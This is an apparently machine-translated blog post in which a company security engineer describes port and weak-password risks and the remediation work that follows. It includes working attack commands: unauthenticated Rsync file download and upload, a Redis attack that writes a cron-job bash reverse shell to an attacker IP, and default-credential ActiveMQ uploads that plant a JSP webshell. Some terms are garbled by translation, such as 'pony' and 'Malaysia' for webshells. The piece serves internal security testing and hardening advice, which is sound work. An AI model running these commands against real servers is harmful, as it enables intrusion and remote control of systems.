IMCAFS

 Home

the security officer in the operation and maintenance department said "port and password security"

Posted by punzalan at 2020-02-29
all

*The author of this article: liong03; this article is an original award program of freebuf, and is not allowed to be reproduced without permission.

1. Preface

First, I'd like to introduce myself. Actually, I'm a safety engineer. Now I am working in an internet financial enterprise in charge of the overall network security of the company.  

When I first came to the company, I knew some enterprise rules and rule makers. Of course, my job is mainly safety. As a newcomer, first understand the company's IT assets. After collecting it assets, make a sort of open port of IP assets. The collection of port information is a very important process, because the penetration of ports in actual combat is a common means.

During the process of port collection, several issues are concerned:

1. Default port for common applications

2. Banner information of port

3. Services running on the port

4. Possible vulnerability

The most common way to obtain port information is nmap (port information is more detailed) and Yujian (only the open port is displayed, which is very fast). You can also scan the port with other host vulnerability scanning tools, such as Tianjing, Aurora and nusses.

2. Common port threats

Penetration through ports will greatly improve the successful efficiency of penetration. It is found that the operation and maintenance personnel have opened many ports in their work, and many of the loopholes exposed on the Internet can be found. For individuals, this is an opportunity to learn and practice, and the environment is well established, but for enterprises, this is a very dangerous thing.

Why are so many ports open? Some ports that have been closed will be reopened after a period of time. There are still some ports that require to be rectified, but they have not. There are many factors in this, including the different awareness and level of personnel safety. The company has also initiated safety awareness training and some safety technical specifications, but the personnel flow is different in their respective specialties and concerns. Even some people think that safety inspection is fault finding, which affects the progress of publishing. Another factor is that most of the security officers of the operation and maintenance department push from the bottom to the top when implementing the security management. What's more embarrassing is that they have changed their leaders. I have also found loopholes for other Party A's enterprises, and told them to seal ports and patch them, but the operation and maintenance personnel didn't rectify them, and then they were hacked about a week later, and spent a lot of money to let me seal ports and patch them. Once in Party A's deep sea...

Most of the security problems encountered in the operation and maintenance department are related to the port and password. The situation in the development department is different. Here are some common ports and possible security problems. Of course, ports should be combined with services. The port here is not complete. I usually think about its service when I see the port. I go to Baidu to check the possible security vulnerabilities, most of which are obtained from CVE, cnvd, security manufacturer's notarization number and various security forums including freebuf. We have also made asset service lists for specific IP ports, services and software versions of enterprises, so that new vulnerabilities can be exposed, and we can quickly know which servers may have security risks.

3. Port vulnerability test

There are also many port vulnerabilities. The following three types of vulnerabilities are common in the intranet. After all, strict port control is usually done in the extranet. The port control in the extranet is much simpler than that in the intranet.

3.1 Rsync unauthorized access vulnerability

3.1.1 vulnerability information

Vulnerability Name: Rsync unauthorized access vulnerability

Vulnerability details: Rsync is not authorized to access due to improper configuration. It can upload and download server files without authorization.

Rsync is a tool for efficiently transferring and synchronizing files across computer systems by checking the time stamp and size of files. Normally, the hypervisor will run the transport task directly after starting the Rsync service. If the Rsync service is not secured, there will be unauthorized access and other security problems; the direct consequence is that the transmission data is exposed in the network and can be accessed by anyone, which brings serious risk of data disclosure.

Vulnerability level: high risk

3.1.2 vulnerability testing

1、 View leaked documents

[email protected]:~# rsync 192.168.3.XXX::

[email protected]:~# rsync 192.168.3.XXX::routing

View routing directory

2. Download files

Download the mfprdapp ﹣ 192.168.3.xxx ﹣ report ﹣ OS ﹣ 2018-01-14-01:05:01.txt file in the routing directory to the root directory of the attacking computer:

[email protected]:~#rsync -avz 192.168.3.xxx::routing/MFPRDAPP_192.168.3.xxx_report_OS_2018-01-14-01:05:01.txt/root

You can see that the file was successfully downloaded to the root directory of the attacking computer:

 

3、 Upload file

Upload the file ylr1801119.jsp in the root directory of the attacking computer to the routing directory of the target server:

[email protected]:~# rsync -avz ylr180119.jsp 192.168.3.xxx::routing

Log in to 192.168.3.xxx server and see that the file ylr1801119.jsp has been uploaded successfully:

The following operation posture depends on personal preference. Here is just to verify that the vulnerability can be used to invade the server.

3.2 redis server remote Execution Vulnerability

3.2.1 vulnerability information

Vulnerability Name: redis server remote Execution Vulnerability

Utilization principle: log in to redis through no password, write to the redis cache, and then save to any directory of the redis server through the redis cache.

Vulnerability level: high risk

3.2.2 vulnerability testing

In order to verify the impact of the vulnerability, a test redis server was built to test the vulnerability attack.

Build test environment:

1) Redis server installation: 2.8.17

2) Redis server (target machine) IP: 192.168.20.105

3) Attack computer, IP: 192.168.20.102

Test process (using bounce shell to control the server):

1. Because the redis server does not set the redis access password by default, the attacking computer can directly write a rebound shell to the rides server cache, which is executed once a minute

[email protected]:~/redis-2.8.17/src# echo -e "\n\n*/1 * * * * /bin/bash -i >&/dev/tcp/192.168.20.102/8880>&1\n\n"|/root/redis-2.8.17/src/redis-cli -h 192.168.20.105 -p6379 -x set 1

2. Log in to the redis server redis service to back up / create a root file in the / var / spool / cron directory

    [email protected]:~/redis-2.8.17/src# ./redis-cli -h 192.168.20.105 -p 6379

        config set dir/var/spool/cron

       config set dbfilename root

       save

    [email protected]:~/redis-2.8.17/src# ./redis-cli -h 192.168.20.105 -p 6379

        config set dir/var/spool/cron

       config set dbfilename root

       save

3. The attacker listens to the rebound shell on the computer, successfully connects to the redis server, and can perform any operation

Of course, there are other use postures, such as:

1) Write the key of SSH, and then use the key to log in remotely;

2) Replace the redis server passwd file;

3) Write the network horse (if you need to find the website path);

3.3 Apache ActiveMQ Remote Code Execution Vulnerability

3.3.1 vulnerability information

Vulnerability Name: Apache ActiveMQ Remote Code Execution Vulnerability

Utilization principle: log in to Apache ActiveMQ by cracking the account password, write to the Apache ActiveMQ directory, and then save the data to any directory of the server through move.

Vulnerability level: high risk

3.3.2 vulnerability testing

1、 Upload pony

First, put a JSP webshell to the fileserver directory

1. Modify put / fileserver /% 20 /% 20 to put / fileserver / xiaoma.jsp

2. Fill in the space below

3. Visit http://192.168.20.101:8161/fileserver/xiaoma.jsp, enter the account password admin / admin to log in successfully, and see that the pony is uploaded successfully

2、 Move pony to Tomcat directory

MOVE/fileserver/xiaoma.jsp

Destination:file:///root/apache-tomcat-7.0.69/webapps/ROOT/xiaoma2.jsp

MOVE/fileserver/xiaoma.jsp

Destination:file:///root/apache-tomcat-7.0.69/webapps/ROOT/xiaoma2.jsp

3、 Use pony to upload Malaysia

Upload Damascus shell.jsp using the pony client

4、 Successful visit to Malaysia

You can use Malaysia to manage the server and do whatever you want Do whatever you want

4. About port and password security

Throughout the port and password security threats, many cases are due to the shortcomings of the default configuration, while the operation and maintenance students have directly used the default configuration for the sake of simplicity. For the safe use of port and password, the following measures are recommended:

1. The host firewall / network firewall access control policy is configured in the form of white list, and only a certain IP is allowed to access a certain port of the service.

2. Close unnecessary ports, especially unnecessary ports, and do not open Internet access.

(many trojan tools also have specific ports, some of which are easily used by malicious people due to configuration.)

3. Set strong passwords and change them regularly.

(password blasting technology is the simplest, and the combination of dictionary and social workers is often used to achieve the most effective blasting.)

4. Try to use explosion-proof password, such as limited times, verification code, etc.

5. Double factor verification shall be used as far as possible for important systems.

6. Do not transfer the account password in clear text.

7. VPN connection shall be adopted for remote operation and maintenance as far as possible.

8. Try to run the service program as a non administrator user.

9. Upgrade the version and patch in time.  

A strong password is a password that has the following characteristics:

1) Both uppercase and lowercase characters;

2) At the same time, it has letters, numbers and special symbols, such as:! @ # $% ^ & * () + | ~ - = \ ` {} [] "; '< >?,. /);

3) 8 characters or more;

4) It's not a dictionary word or Pinyin;

5) Not based on personal information, name and family information.

5. Safety rectification

After collecting the port information, I found many problems and talked with the operation and maintenance personnel and developers about life. It is found that the operation and maintenance personnel and developers don't know much about security, and the security personnel don't know much about operation and development, at least as I did before. Take port and weak password for example. For security personnel, general suggestions are found: change password and close port; restrict IP access; patch / upgrade version; delete some configuration files. In the actual situation, operation and maintenance or development will give feedback:

1) Password change will involve some application calls, which need to change the configuration of several places at the same time;

2) There are other systems that need to call these ports, which is very troublesome to rectify;

3) Linux firewall is good at limiting IP, windows firewall has many holes, network firewall may have to change several firewalls, and the firewall strategy has been very messy;

4) Some patches cannot be patched, the version cannot be upgraded, or even upgraded and patched;

5) This problem seems to have no effect. I'll change it slowly, and it may end up in the end;

6) Is there a simpler way? I choose the simpler one.  

I'm just a safety engineer, and my leader has been promoted. I have no strong backing. Fortunately, I know a little about operation and maintenance and development with so many years of work experience, and I still need to continue my safety work:

1) Analyze the rectification methods one by one, discuss the feasibility, even make some operation steps into manuals, and even write the installation and configuration manual of anti-virus software;

2) To list the risk of problems, or even to successfully infiltrate, if necessary, to issue a safety notice, safety early warning, etc., is mainly to attract attention to the problem, but also to avoid the responsibility of the problem.

The loopholes have been successfully used, and the rectification operation manual is available. Everyone agrees to rectify, and then loopholes tracking forms a closed loop.

*The author of this article: liong03; this article is an original award program of freebuf, and is not allowed to be reproduced without permission.

© 2023